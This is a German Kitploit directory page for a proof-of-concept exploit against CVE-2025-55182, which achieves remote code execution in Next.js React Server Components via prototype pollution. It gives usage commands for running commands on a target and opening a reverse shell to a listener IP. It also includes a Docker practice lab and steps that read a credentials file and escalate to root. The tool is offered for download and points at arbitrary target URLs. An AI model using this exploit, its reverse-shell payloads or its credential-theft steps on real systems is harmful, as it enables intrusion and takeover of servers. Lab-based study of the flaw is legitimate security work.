Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC_react2shell_CVE-2025-55182 — Exploit für CVE-2025-55182, der Next.js React Server Components über Prototype Pollution angreift und Remote-Code-Ausführung mit Befehlausführung und Reverse-Shell-Payloads ermöglicht. Enthält Docker-Lab-Umgebungen zum Üben. | Kitploit
Tools/GitHubGitHub/nkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182
Payload-GenerierungExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis
GitHubnkwenti-severian-ndongtsop/poc_react2shell_cve-2025-55182

POC_react2shell_CVE-2025-55182

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Exploit für CVE-2025-55182, der Next.js React Server Components über Prototype Pollution angreift und Remote-Code-Ausführung mit Befehlausführung und Reverse-Shell-Payloads ermöglicht. Enthält Docker-Lab-Umgebungen zum Üben.

Repository anzeigenWebseite
24vor 8 MonatenNoch nicht geprüft
Teilen

Next.js React Server Components RCE-Exploit

Nutzt CVE-2025-55182 für Remote-Codeausführung (RCE) über Prototype Pollution aus.

Autor: Severian N.K.

Beschreibung

Dieses Tool nutzt eine Prototype-Pollution-Schwachstelle in Next.js-Anwendungen mit React Server Components aus, die zu Remote Code Execution (RCE) führt. Es unterstützt sowohl die direkte Befehlsausführung als auch Reverse Shells.

Installation

Dieses Projekt verwendet eine Python-Virtual-Environment zur Verwaltung der Abhängigkeiten. Stellen Sie zunächst sicher, dass Python 3 installiert ist.

  1. Virtuelle Umgebung einrichten:

    root@kitploit:~
    python3 -m venv venv
    
  2. Umgebung aktivieren und Abhängigkeiten installieren:

    root@kitploit:~
    source venv/bin/activate
    pip install -r requirements.txt
    

Verwendung

Stellen Sie sicher, dass die virtuelle Umgebung aktiviert ist (source venv/bin/activate), bevor Sie den Exploit ausführen.

Befehlsausführung

Um einen einzelnen Befehl auf dem Ziel auszuführen:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"

Beispiel:

root@kitploit:~
python3 exploit.py -u http://example.com -c "id"

Reverse Shell

Um eine Reverse Shell vom Ziel zu erhalten:

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>

Beispiel:

root@kitploit:~
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo

Laborumgebung

Das Verzeichnis lab/ enthält zwei unabhängige Docker-Umgebungen:

  1. Verwundbare App (lab/vulnerable): Läuft auf Port 3000.
  2. Gepatchte App (lab/patched): Läuft auf Port 3001.

1. Verwundbare App einrichten

root@kitploit:~
cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh

Erreichbar unter: http://localhost:3000

2. Gepatchte App einrichten

root@kitploit:~
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh

Erreichbar unter: http://localhost:3001

3. Reverse Shell testen

Sie müssen Ihre Listener-IP (--lhost) und den Port (--lport) angeben. Ihre Docker-Bridge-IP finden Sie mit ip addr show docker0 (normalerweise 172.17.0.1).

root@kitploit:~
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo

Hinweis: Wir verwenden -P nc-mkfifo, weil das Ziel unter Alpine Linux läuft und einen bestimmten Payload-Typ erfordert.

Schritt 2: Auf Geheimnisse zugreifen

Der verwundbare Container stellt eine geheime Datei bereit.

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!

Schritt 3: Privilegieneskalation

Sie können mit den kompromittierten Anmeldedaten von nextjs zu root eskalieren.

  1. Benutzer wechseln: su - manager (Passwort: SuperSecret2025!)
  2. Root werden: sudo su (Passwort: SuperSecret2025!)
  3. Flag abrufen:
    root@kitploit:~
    cat /root/flag.txt
    # Output: Congratulations! You have gained full control over the system!
    

Referenzen

  • Technische Analyse (Gist)
  • Hands-on-Lab (TryHackMe)

Mitwirken

Beiträge sind willkommen! Wenn Sie einen Fehler finden oder eine Idee für eine Verbesserung haben, eröffnen Sie bitte ein Issue oder reichen Sie einen Pull Request ein.

Tool herunterladen